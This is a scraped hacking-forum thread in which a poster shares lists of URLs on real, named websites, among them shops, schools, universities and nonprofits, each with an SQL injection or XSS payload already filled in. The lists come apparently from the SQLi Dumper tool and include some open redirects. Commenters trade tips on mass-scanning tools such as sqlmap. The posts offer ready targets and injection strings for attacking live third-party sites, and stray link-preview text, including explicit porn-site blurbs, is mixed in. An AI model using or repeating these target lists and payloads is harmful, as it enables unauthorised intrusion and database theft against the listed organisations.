New Vulnerable URL-LIST -{SQL-Inj}-{XSS/LFI/RFI}-

edie · 17.05.2020

I sharing Vulnerable URLs from SQLI Dumper.

Vulnerable sites are not hacked by me!

I don't responsible for your actions!

SQLI 83 URL - NEW 05.16

У вас должно быть более 1 реакций для просмотра скрытого контента.

[CLIKE]http://www.ayurvedabodycure.com/static.php?id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10
http://city.tachikawaonline.jp/view.php?area=999999.9 union all select [t]&id=786&mode=details
http://www.4teachers.org/archive/index.php?cat=4 and 1=[t] and 1=1
http://www.costi.org/programs/location_details.php?location_id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

https://burgess-shale.rom.on.ca/en/fossil-gallery/view-species.php?id=[t]

韓国情報発信基地！innolife.net

contents.innolife.net

http://www.17circolodidatticopoggiofrancobari.edu.it/gallery.php?step=2&id_gallery=999999.9 union all select 1,2,3,4,5,[t],7,8,9,10,11&id_cat=7&id_sottocat1=&id_sottocat2=0&titolo_cat=Plesso

http://www.mitsuhamaru.com/map/detail.php?id=[t]

https://www.australia-campervans.com.au/mobile/quoting/display.php?category=1&order=&num=604' and [t] and '1'='1
http://bired.org/aboutUs.php?id=999999.9 union all select 1,[t],3,4,5
http://www.vcavtomobilist.ru/comments.php?id=999999.9 union all select 1,2,3,[t]
http://www.lasun-jlu.cn/member.php?id=999999.9 union all select 1,2,3,4,5,6,7,8,9,[t],11,12,13,14
https://www.suzaka.ne.jp/farm/suzuki/index.php?cat=999999.9 union all select 1,[t],3

https://www.trmh.com/rvdetail.php?id=[t]

http://kizakura.co.jp/ja/prod_data/info.php?type=items3&id=IC000119' and 1=[t] and '1'='1
https://e-nissho.co.jp/blog/detail.php?id=406' and [t] and '1'='1
http://www.displaysbyrioux.com/product.php?cat_id=999999.9 union all select 1,2,[t],4,5,6--
https://www.activeat.in/blog-detail.php?id=23999999.9' union all select 1,[t],3,4,5,6,7 and '1'='1
https://muslim4health.or.th/blog-detail.php?id=77' and [t] and '1'='1
https://www.igcd.net/yourcomments.php?id=Silne' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,[t],16,17,18,19,20,21 and '1'='1
https://renovalifescience.com/blog_detail.php?id=3999999.9' union all select 1,[t],3,4,5,6,7,8 and '1'='1
http://lapin-esthe.net/blog_detail.php?id=999999.9 union all select [t],2,3,4,5
https://www.theboxla.com/show.php?id=6224' and [t] and '1'='1
https://www.panki.it/en/gallery.php?id=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
https://www.nicksnestholyoke.com/gallery.php?id=18999999.9' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,[t],27,28 and '1'='1
http://jhbgallery.com/m/artist.php?id=999999.9 union all select 1,2,3,[t],5,6
https://www.appasamy.com/gallery.php?id=9' union all select 1,[t],3,4,5,6 and '1'='1
https://www.kashmiribhatta.in/bookview.php?id=13' union all select 1,[t],3,4 and '1'='1
http://clubs.beder.edu.al/clubs.php?id=999999.9' union all select 1,2,[t],4,5,6,7,8,9,10 and '1'='1&cid=6&iid=23
https://www.dailyranger.com/printstory.php?id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15

http://alaberest.com/aboutus.php?id=[t]

http://petrozas.com/aboutus.php?id=' union all select 1,[t],3,4 and '1'='1
http://freestylebarbershop.com.au/story.php?id=2999999.9' union all select 1,[t],3,4,5 and '1'='1
http://www.yunnanwater.com.hk/en/about_us.php?id=1999999.9' union all select 1,2,3,4,5,6,7,8,9,[t],11,12,13,14,15 and '1'='1
http://www.koreandessert.co.kr/new/board_view.html?id=12540' union all select 1,2,[t],4,5 and '1'='1
http://www.yakutama.jp/ng_interview_display.php?id=999999.9 union all select [t]
http://www.cm-girls.jp/ng_interview_display.php?id=999999.9 union all select [t]
http://www.sbalipb.bg/team_display.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12

http://www.mmarmy.com/org_display.php?id=[t]

http://www.horsetackreview.com/make-display.php?ID=999999.9 union all select 1,[t],3,4
http://www.fishingas.com/board/board_read.php?code=B1141709790' and [t] and '1'='1&srlno=1406&page=&state=3&searchString=&find=&m_idx=BOARD

http://www.canterburyct.org/board.php?id=[t]

http://www.delphilaser.com/job_reply.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
https://www.minddesign.co.uk/show.php?id=174999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16 and '1'='1&pos=6&cat=2
https://ica-arab.com/en/board.php?id=2' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '1'='1&?mid=2&msid=76
http://www.olesnica.wroc.pl/gmina.php?id=159&pkat=999999.9 union all select 1,2,[t],4,5,6--
http://membranyventus.pl/galeria.php?cid=31' union all select 1,[t],3,4,5,6 and '1'='1
http://www.choragwica.pl/galeria.php?cid=5' union all select 1,[t],3,4,5 and '1'='1
https://www.gogardening.co.nz/insidepage.php?mid=4' or [t] and '1'='1&gid=0&cid=1094&listparam=maglist&title=Magazine stockists
https://www.gapjapan.jp/eng/collection_list.php?cid=999999.9 union all select [t],2,3,4,5,6,7,8,9
http://www.hoferwaffen.com/hofer_10g.php?pid=126 and 1=[t] and 1=1&cid=12&lang=en
https://www.kanehara-shuppan.co.jp/books/detail.html?isbn=9784307071055' and [t] and '1'='1
http://shouieco.com.tw/product.php?id=86999999.9' union all select 1,2,3,4,[t],6,7,8,9,10 and '1'='1
http://www.rosonelec.com/productsview.php?id=83&proid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,[t],16,17,18
http://www.fifi.in/events-detail.php?id=2' union all select 1,2,[t],4,5,6,7,8 and '1'='1
http://koruss.org/kboard/kboard.php?board=newsletter&act=view&no=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18,19,20&page=1&search_mode=&search_word=&cid=
http://pizzatong.co.kr/kboard/kboard.php?board=pizza_1&act=view&no=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18,19,20&page=1&search_mode=&search_word=&cid=
http://www.christianhealing.co.kr/kboard/kboard.php?board=mesege&act=view&no=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18,19,20&page=4&search_mode=&search_word=&cid=
http://www.goldxinxing.com/productsview.php?proid=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,[t],15,16,17,18,19&id=62&type=products
http://kpcd.or.kr/kboard/kboard.php?board=notice&act=view&no=999999.9 union all select 1,[t],3,4,5,6,7,8&page=1&search_mode=&search_word=&cid=
https://aianova.org/event.php?eventID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16
http://www.mentorvis.com/kboard/kboard.php?board=notice&act=view&no=999999.9 union all select [t],2,3,4,5,6,7,8,9
http://sscnc.co.kr/kboard/kboard.php?board=photogallery&act=view&no=999999.9 union all select 1,[t],3,4,5,6,7,8
http://www.batterynet.co.kr/kboard/kboard.php?board=comm&act=view&no=999999.9 union all select [t],2,3,4,5,6,7,8,9
http://cai.or.kr/kboard/kboard.php?board=map&act=view&no=999999.9 union all select 1,[t],3,4,5,6,7,8&page=1&search_mode=&search_word=&cid=
http://batterynet.co.kr/kboard/kboard.php?board=comm&act=view&no=999999.9 union all select [t],2,3,4,5,6,7,8,9
http://www.kanomax.co.kr/kboard/kboard.php?board=qna&act=view&no=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18,19,20&page=1&search_mode=&search_word=&cid=
http://www.traci.kr/kboard/kboard.php?board=pictures and 1'='1' union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 and '1'='1
https://www.pacher.co.kr/m_view.php?ps_db=notice&ps_boid=999999.9 union all select 1,2,3,4,5,6,7,8,[t],10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
https://www.jandtfredrickson.com/obituaries/index.php?id=2022' and [t] and '1'='1
http://www.lifeyak.com/morningmall/m_view.php?ps_db=photo&ps_boid=999999.9 union all select 1,2,3,4,5,6,7,8,[t],10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31
http://www.life21c.co.kr/shop/m_vie...ps_sele=&ps_ques=&ps_line=&ps_choi=&ps_coid=0' and [t] and '1'='1&ps_divi=&list_category=
https://www.panaxtos.com/m_view.php?ps_db=research&ps_boid=9&ps_category=0' and [t] and '1'='1&ps_mode=
http://www.vipok.kr/m_view.php?ps_db=notice' and [t] and '1'='1&ps_boid=31
https://sails.corsairs.network/bookPage.php?id=10028' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '1'='1
http://boardlife.co.kr/bbs_detail.php?bbs_num=4329 and 1=[t] and 1=1&id=&tb=info_movie&game_category=
https://iacf.daegu.ac.kr:5011/front/board/view.php?code=iacf7_1' and [t] and '1'='1&no=52
http://nurse.hosan.ac.kr/front/board/view.php?code=notice&no=576' and [t] and '1'='1

http://www.beansbins.com/shop/m_view.php?ps_db=coffee_tea&ps_boid=27&ps_page=1&ps_sele=&ps_ques=&ps_line=&ps_choi=&ps_coid=0&ps_divi=&list_category=[t]

http://www.orbitbaby.co.kr/board/zb/view.php?uid=[t]&startPage=4&boardid=zb_photo&category=��ü

http://www.ebumil.com/zb/view.php?uid=1&startPage=1&boardid=zb_notice' and [t] and '1'='1&category=��ü
http://dreamrivershinhan.com/zb/view.php?uid=1&startPage=1&boardid=zb_notice' and [t] and '1'='1

http://www.cfaf.or.kr/zb/view.php?uid=[t]&startPage=1&boardid=zb_sd05&category=��ü&code=sd&PHPSESSID=b2e5e6946209fa427a67d21899890f27[/CLIKE]

XSS/LFI/RFI 19 URL - NEW 05.16

У вас должно быть более 1 реакций для просмотра скрытого контента.

[CLIKE]https://www.thefisherman.com/index.cfm?fuseaction="><script >alert(String.fromCharCode(88,83,83))</script>&category_id=19
https://graphicriver.net/popular_item/by_category?category="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.bevcomm.net/site/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=article&id=439&Itemid=595
https://dane.ac-creteil.fr/spip.php?page="><script >alert(String.fromCharCode(88,83,83))</script>&id_article=845
https://www.lecrat.fr/spip.php?page="><script >alert(String.fromCharCode(88,83,83))</script>&id_article=42
https://periodicos.uninove.br/index.php?journal="><script >alert(String.fromCharCode(88,83,83))</script>
https://bbs.tongji.net/home.php?mod="><script >alert(String.fromCharCode(88,83,83))</script>&do=notice&view=mypos
https://rehabnurse.org/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=article&id=304:info&catid=17&Itemid=1062
https://www.saerohands.com:10446/mall/m_view.php?ps_db="><script >alert(String.fromCharCode(88,83,83))</script>&ps_boid=233&ps_page=1&ps_sele=&ps_ques=&ps_line=&ps_choi=&ps_divi=&ps_category=3
http://cibolocanyonsvet.com/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=article&id=104

http://phome.postech.ac.kr/user/boardList.action?command=view&siteId=mse&boardId=40915&page=2&boardSeq=19061&search=&column=&categoryId=&categoryDepth=&parent=http%3a%2f%2fwww.google.com

http://www.officeone.co.kr/mall/m_view.php?ps_db="><script >alert(String.fromCharCode(88,83,83))</script>&ps_boid=10
https://www.pinterest.co.kr/pin/396...IENT_ID(_)&mweb_unauth_id=&from_amp_pin_page="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.jhmungu.com:10456/mall/m_login.php?url="><script >alert(String.fromCharCode(88,83,83))</script>&ps_db=great_buying&ps_boid=40&ps_bcid=&ps_line=&ps_choi=&ps_divi=&ps_sele=&ps_ques=&ps_page=1
https://www.typemoon.net/bbs/board.php?bo_table="><script >alert(String.fromCharCode(88,83,83))</script>&wr_id=374246
https://www.dreamoffice.com:10456/mall/m_view.php?ps_db="><script >alert(String.fromCharCode(88,83,83))</script>&ps_boid=34&ps_page=1&ps_sele=&ps_ques=&ps_line=&ps_choi=&ps_divi=&ps_category=0
http://www.hanbayinc.com/en/products.php?act="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.illustin.co.kr/board/bbs_view.php?no=10937&Category="><script >alert(String.fromCharCode(88,83,83))</script>&Category1=
http://www.fifakorea.net/bbs/view.php?no=1148&id="><script >alert(String.fromCharCode(88,83,83))</script>[/CLIKE]

rlz · 22.05.2020

Good to see SQL dumper still working )

nexxxt · 26.05.2020

Curious to see what the results will look like. I'm surprised people still using SQLi DUmper.

gangst3r · 26.05.2020

nexxxt Do you have any other alternative for SQLi Dumper?

indounderground · 30.05.2020

What people use these days to find sqli, I am not too updated in web vulnerability things

edie · 31.05.2020

SQLI 35 URL

У вас должно быть более 1 реакций для просмотра скрытого контента.

http://bussmannasia.com/Products_detail.php?CategoryId=[t]&Id=7

https://herbarium.utk.edu/vascular/...ID=Dicots&FamilyID=Cannabaceae&GenusID=Celtis' and [t] and '1'='1&SpeciesID=laevigata
http://www.onebidjapan.com/jp/productdetail.php?pid=999999.9 union all select 1,[t],3,4,5,6,7,8,9&cat=0
http://www.ionique.co.th/TH/productdetails.php?Id=37 and 1=[t] and 1=1
http://www.jmzjtech.com/en/prodetail.php?id=999999.9 union all select 1,2,[t]
http://siddiquesons.com/products.php?id=130999999.9' union all select 1,2,[t],4,5,6 and '1'='1
https://www.factnfair.com/products.php?id=31999999.9' union all select 1,2,3,[t],5,6 and '1'='1&page=1
http://www.rawahainc.com/products.php?id=3' and [t] and '1'='1
https://www.wtssa.com/products.php?id=136' and [t] and '1'='1

https://blystonefarm.com/wagyu_products.php?Id=[t]&Meat=Wagyu

http://www.zmfinter.com/page.php?id=2999999.9' union all select 1,[t],3,4 and '1'='1
http://www.hydropack.com.tr/products.php?id=1' union all select [t],2,3,4,5,6,7 and '1'='1
http://maritimewelding.com/products.php?id=999999.9 union all select [t]
http://www.dochem.cn/productpage.php?id=3999999.9' union all select 1,2,3,4,5,6,7,8,9,[t],11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 and '1'='1
http://www.vaxform.com/updates.php?id=999999.9 union all select 1,2,[t],4,5
http://www.nyyc.info/news.php?ID=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10
http://designingitaly.com/form.php?id=999999.9 union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15,16,17
https://www.welltechproducts.com/productpage.php?id=9' union all select 1,2,3,4,[t],6,7 and '1'='1

Deportes Pachuca

LinkDirectory - Error

http://www.chwufang.com/productdisplay.php?sortid=[t]

XSS - 53 URL

У вас должно быть более 1 реакций для просмотра скрытого контента.

https://shop.murrelektronik.com/index.php?cl="><script >alert(String.fromCharCode(88,83,83))</script>&fnc=outputSpecSheet&anid=7000-14521-0000000_1
https://qdigitizing.com/designdetailspromo.php?id=1124&dname="><script >alert(String.fromCharCode(88,83,83))</script>
https://4promote.com.au/promos/www/product/productinfo.php?name="><script >alert(String.fromCharCode(88,83,83))</script>&scd=SM-3734_BUL&printed=1
https://www.goodgear.com.au/vcquotesystem//www/product/productinfo.php?name="><script >alert(String.fromCharCode(88,83,83))</script>&scd=PXL3967_PC&printed=1
https://store.stevesgunz.com/index.php?main_page="><script >alert(String.fromCharCode(88,83,83))</script>&products_id=10
https://www.fmelighting.com/ProductPage.php?id=912&subCat="><script >alert(String.fromCharCode(88,83,83))</script>&theCat=LED Life-Safety

Google

https://www.identipro.co.uk/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>
https://bargainmugs.com/index.php?main_page="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.justaddnic.co.uk/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>
https://dev.pccdining.com/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=contact&id=1&Itemid=2
https://www.northcountrypublicradio.org/news/nprnews.php?id[826035669]="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.netpacktechs.com/Netpac/website/emailtofriend.php?url="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.slimwareutilities.com/community/info.php?id=321732426&type="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.quicknametags.com/productbuilder.php?productID=1&cartID=0&display="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.kanda.com/faqs.php?id=14&topic="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.michtoy.com/michtoy_search_products.php?Types="><script >alert(String.fromCharCode(88,83,83))</script>&Categories=Plastic Display Cases
http://www.freeimagestocks.com/content.php?id="><script >alert(String.fromCharCode(88,83,83))</script>
http://freeimagestocks.com/content.php?id="><script >alert(String.fromCharCode(88,83,83))</script>
https://awaytogo.co.nz/index.php?route="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.eslvideo.com/category.php?catid="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.masoncontractors.org/category.php?tag_slug="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.mox.com.tr/catalog.php?p="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.dalsaram.com/sale/buy.php?boardgubun="><script >alert(String.fromCharCode(88,83,83))</script>&code=dallas_115&id=2654&i_no=&i_key=&i_value=&ac=

engarde-service: fencing competitions managed with Engarde

Publishing the results of fencing competitions managed with Engarde

engarde-service.com

https://www.bio-world.com/index.php?main_page="><script >alert(String.fromCharCode(88,83,83))</script>&id=6
http://www.thefccnetwork.com/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=article&id=3:-air-products-and-chemicals-inc&catid=1:sponsors&Itemid=6
http://bgcnewhaven.org/?ch_staff="><script >alert(String.fromCharCode(88,83,83))</script>
https://scripts.sil.org/cms/scripts/page.php?site_id="><script >alert(String.fromCharCode(88,83,83))</script>&item_id=iSearchBoxReference
https://hardwareandlumber.com/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=contact&id=1&Itemid=106&lang=en
http://shopmager.com/cart.php?action="><script >alert(String.fromCharCode(88,83,83))</script>&p=896
https://smartpunchen.de/addtoCart.php?id=19934&itemType=1&addID="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.adonisandabbey.com/book_detail.php?bookid=90&fcmg="><script >alert(String.fromCharCode(88,83,83))</script>
http://campusvirtual.sabes.edu.mx/SSOLiveSABES/Login.aspx?ReturnUrl="><script >alert(String.fromCharCode(88,83,83))</script>
https://jzamora4.create.stedwards.edu/iSnack2/cartAction.php?action="><script >alert(String.fromCharCode(88,83,83))</script>&id=226

Google

https://www.upstate.edu/cancer/research/clin_trials.php?stage=1&subcat_id=&numuid=&kwitem="><script >alert(String.fromCharCode(88,83,83))</script>&search=Searc

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

www.affittacamerecorradini.com

http://75.112.160.123/WebLink/DocView.aspx?id=63422&dbid=0&repo="><script >alert(String.fromCharCode(88,83,83))</script>
https://agendasonline.greatersudbury.ca/index.cfm?pg="><script >alert(String.fromCharCode(88,83,83))</script>&action=file&attachment=13305.pdf

http://www.instyleway.com/add_cart.php?id=218&return_url=http%3a%2f%2fwww.google.com

http://prismconsultant.co.uk/sndates/add_to_cart.php?id=37&name=Rabia Unpacked (1 KG)&quantity=1&upsell=2&options=0&url=http%3a%2f%2fwww.google.com
https://warbirdsofglory.org/ItemDetails.asp?IN="><script >alert(String.fromCharCode(88,83,83))</script>
https://aalbc.com/search.php?find="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.italianshoefactory.com/?referer="><script >alert(String.fromCharCode(88,83,83))</script>&utm_source=dubiki.com
https://www.hostinginside.com/billing/cart.php?a="><script >alert(String.fromCharCode(88,83,83))</script>&pid=136
https://www.beggshoes.com/skechers-microburst-lit-black-BBK-23336?ref=PPC&currency=GBP&action="><script >alert(String.fromCharCode(88,83,83))</script>&inc_vat=true
https://epos.myesr.org/esr/viewing/index.php?module="><script >alert(String.fromCharCode(88,83,83))</script>&task=&pi=129502
http://jnegreenteam.com/mmwyp/zvti.php?sl="><script >alert(String.fromCharCode(88,83,83))</script>

Pornhub.com

Watch Ooops, fuck too hard cum inside her tiny pussy on Pornhub.com, the best hardcore porn site. Pornhub is home to the widest selection of free Babe sex videos full of the hottest pornstars. If you're craving 18 XXX movies you'll find them here.

xnxxfreeporno.com

http://naprapato.ga/video.php?cid=993&tid=3460144&pos=4361&url="><script >alert(String.fromCharCode(88,83,83))</script>&utm_source=blackrose&utm_medium=PT&utm_campaign=blackrose
http://odbinshundar.ga/video.php?cid=700&tid=4379339&pos=214&url="><script >alert(String.fromCharCode(88,83,83))</script>
http://ak-builder.com/index.php?dispatch="><script >alert(String.fromCharCode(88,83,83))</script>&product_id=30364

Peter · 04.06.2020

@indounderground SQLmap?

nexxxt · 09.06.2020

Peter сказал(а):

@indounderground SQLmap?

One of the best if not the best tool to disocver and dump db. For mass scanning sites probably other tools are recommended. Acunetix,Netsparker,Burp etc

Darkforce · 02.07.2020

yes SQLi Dumper is working

phicker · 03.07.2020

indounderground сказал(а):

What people use these days to find sqli, I am not too updated in web vulnerability things

https://github.com/shack2/SuperSQLInjectionV1，you can try it

flyingcup0967 · 04.07.2020

[QUOTE = "edie, post: 227461, member: 188425"]
I sharing Vulnerable URLs from SQLI Dumper.

Vulnerable sites are not hacked by me!

I don't responsible for your actions!

SQLI 83 URL - NEW 05.16
Hidden content

XSS / LFI / RFI 19 URL - NEW 05.16
Hidden content
[/ QUOTE]
gd finding

nescan · 04.07.2020

flyingcup0967 сказал(а):

[QUOTE = "edie, post: 227461, member: 188425"]
I sharing Vulnerable URLs from SQLI Dumper.

Vulnerable sites are not hacked by me!

I don't responsible for your actions!

SQLI 83 URL - NEW 05.16
Hidden content

XSS / LFI / RFI 19 URL - NEW 05.16
Hidden content
[/ QUOTE]
gd finding

?????

edie · 05.07.2020

SQLI - 45 URL (Most new, few old one)

У вас должно быть более 1 реакций для просмотра скрытого контента.

http://www.ilink.ph/view.php?id=[t]

https://www.mynamepixs.com/category.php?id=201' and [t] and '1'='1

https://member.akikawabokuen.com/webshop/products/list.php?category_id=[t]

http://www.webvisionitaly.com/category.php?id=[t]

http://www.vita-inc.jp/search_print.php?cat=MED-SRM-01-0002 and 1'='1' union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 and '1'='1
https://tablescapes.com/product_info.php?menulevel=2&cat_id=192' or [t] and '1'='1&productid=555

http://alcproperties.com/resource-links.php?cat=[t]

https://keralalocaljobs.com/MoreDetails.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
http://previewgeorgiahomes.com/listings/listings/index.php?id=420' and [t] and '1'='1&action=more_details

http://artstatements.com/artist_art.php?id=[t]

http://lampefuneralhome.com/details.php?id=999999.9 union all select 1,[t],3,4,5,6

http://www.tinpok.com/list.php?cate_id=[t]

【HP会員以外】丹波市観光協会

丹波市観光の魅力をたっぷりと紹介する、丹波市観光協会オフィシャルサイトです

www.tambacity-kankou.jp

http://editions-aire.ch/details.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
http://usedclinicalequipment.com/view_items.php?id=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15,16,17,18
http://www.sandexgroup.com/about.php?id=p and 1'='1' union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14,15 and '1'='1
http://www.natomusic.fr/artisans/jazz/artisans-detail.php?id=124' union all select [t],2,3,4,5,6,7,8,9,10,11,12,13,14 and '1'='1
http://www.anzianiguitar.com/detail.php?id=999999.9 union all select 1,2,3,4,[t],6,7,8,9,10,11,12
https://www.royalhost-sa.com/index_en.php?op=productscat' and [t] and '1'='1&id=1

http://www.civilwarbadges.com/cgi-bin/Display_Items_Gal.asp?Cat=[t]&Sub=19

https://wales.pallcare.info/index.php?p=cat&cid=[t]

http://www.coda.cc/product/product.php?id=999999.9 union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13
http://old.harbourfood.com/products/default.php?cat=Equipment' and [t] and '1'='1&cls=&subcls=&vendor=174

https://ijto.or.kr/english/index.php?cid=[t]

https://www.pleasantongarlex.com/menu-items.php?cid=21' union all select 1,[t],3,4,5,6,7,8 and '1'='1
http://www.bonnerconcrete.com/products.php?cat_id=999999.9 union all select 1,[t],3,4,5

https://floralalliance.com/development/futurelife/product_info.php?cId=[t]

https://bluechipindia.co.in/main.aspx?id=8pCapBond' and 1=[t] and '1'='1

Anglo American Book

https://vigini.in/detail.php?id=75' union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '1'='1
http://www.mcstone.co.uk/kitchens.php?id=11999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12 and '1'='1
https://buntschamber.com/news-detail.php?id=9' union all select 1,2,[t],4,5,6,7 and '1'='1
https://www.fifi.in/events-detail.php?id=2' union all select 1,2,[t],4,5,6,7,8 and '1'='1
https://ssy.org/main.php?id=' or [t] and '1'='1
https://www.makeartwithpurpose.net/projects.php?id=999999.9 union all select 1,[t]

http://www.sozpaed-verein.de/main.php?cId=1021&pId=[t]

https://fxfarms.com/NewsDetails.aspx?ID=113999999.9' union all select 1,[t],3,4,5,6 and '1'='1
https://secure.njcar.org/secure/onlineStoreDEV/dsp_productList.cfm?cat=999999.9 union all select [t]
http://hardnews.mn/cat.php?cid=999999.9' union all select 1,[t],3,4,5,6,7,8 and '1'='1&pg=1940

http://ecsellonline.com/product/iitem.jsp?p=4&c=[t]

http://www.hangchabrasil.com.br/produtos.php?cat=999999.9 union all select 1,[t],3,4
https://www.writersmugs.com/books/books.php?book=92' and [t] and '1'='1&name=Kafka&title=Diaries_1911__part_2
http://www.etorshop.com/SearchResults.php?Cat=Grocery' and [t] and '1'='1

https://www.buyersgohappy.com/retailers.php?cat=[t]

https://www.theresearchcorporation.com/enquiry-before-buying.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12

XSS - 30 URL

У вас должно быть более 1 реакций для просмотра скрытого контента.

http://www.webinads.com/cgi-bin/category.cgi?cat="><script >alert(String.fromCharCode(88,83,83))</script>&st=N
https://sites.tesol.org/ItemDetail?iProductCode=196&Category="><script >alert(String.fromCharCode(88,83,83))</script>&WebsiteKey=0d1b66b8-c087-413e-94b1-74021c640176
http://www.iypstore.com/productdetail.aspx?ProductCode="><script >alert(String.fromCharCode(88,83,83))</script>&PK=19941641-521e-4fbb-a722-6232873a2a89
https://www.publicjobs.ie/en/index.php?option="><script >alert(String.fromCharCode(88,83,83))</script>&view=jobdetails&Itemid=263&cid=120428&campaignId=2083801&utm_source=Execjobs&utm_medium=Online_Ad&utm_campaign=NESC_SenPolicyAnalyst
https://www.urmc.rochester.edu/encyclopedia/content.aspx?contenttypeid=167&contentid="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.qiagen.com/jp/resources/download.aspx?id="><script >alert(String.fromCharCode(88,83,83))</script>&lang=en
https://www.memphiszoo.org/default.aspx?p=159264&evtid="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.parkguellonline.cat/pg_muslinkIII/venda/index.jsp?lang=3&nom_cache="><script >alert(String.fromCharCode(88,83,83))</script>&property=PARC&grupActiv=1
https://parkguell.barcelona/en?q="><script >alert(String.fromCharCode(88,83,83))</script>
https://www.eurl-fish-crustacean.eu...Session-3/2-Olesen-Diagnostic-manual.ashx?la="><script >alert(String.fromCharCode(88,83,83))</script>&hash=A7240915AE737C507B5090A07D31FC01AC48687C

Google

https://www.dogcat.com/professionnel/product_info.php?products_id=5684&language="><script >alert(String.fromCharCode(88,83,83))</script>
http://www.gendepot.com/product/list.php?ca_id="><script >alert(String.fromCharCode(88,83,83))</script>
https://jarcs.ut.ac.ir/?_action="><script >alert(String.fromCharCode(88,83,83))</script>&rf=idc&issue=8159

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

www.betusracing.ag

Google

Поиск информации в интернете: веб страницы, картинки, видео и многое другое.

betusracing.ag

http://insidesalesemail.com/dl.aspx?cid=7521&pv_url=Http%3a%2f%2fWww.Google.Com

https://search.zonealarm.com/search?q="><script >alert(String.fromCharCode(88,83,83))</script>&lan=cs&src=sp&tbid=goughDev3&gu=64fd293c4a0c44d38046d4702190bc1a&tu=11J

https://www7.gibraltarca.com/dl.aspx?cid=5466&pv_url=Http%3a%2f%2fWww.Google.Com

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

www.chooseabikini.com

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

bdsmsport.com

Google

Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for.

www.hard-trance.com

https://www.yzzk.com/cfm/content_archive.cfm?id=1542857406399&docissue="><script >alert(String.fromCharCode(88,83,83))</script>

Google

http://www.netdania.com/Products/News/NewsStory.aspx?id=1143899@fxWire@NC-RNA{"Syms":[{"sym":"BTCUSD","isin":"FXBTCUSD"},{"sym":"GBPUSD","isin":"FXGBPUSD"},{"sym":"USDGBP","isin":"FXUSDGBP"}],"Inf":{"CTR":"us"}}&p=fxwire&s=fxWire@NC-RNA&t=1545637178&h="><script >alert(String.fromCharCode(88,83,83))</script>&follow=False

MarketBeat: Stock Market News and Research Tools

Read the latest stock market news on MarketBeat. Get real-time analyst ratings, dividend information, earnings results, financials, headlines, insider trades and options data for any stock.

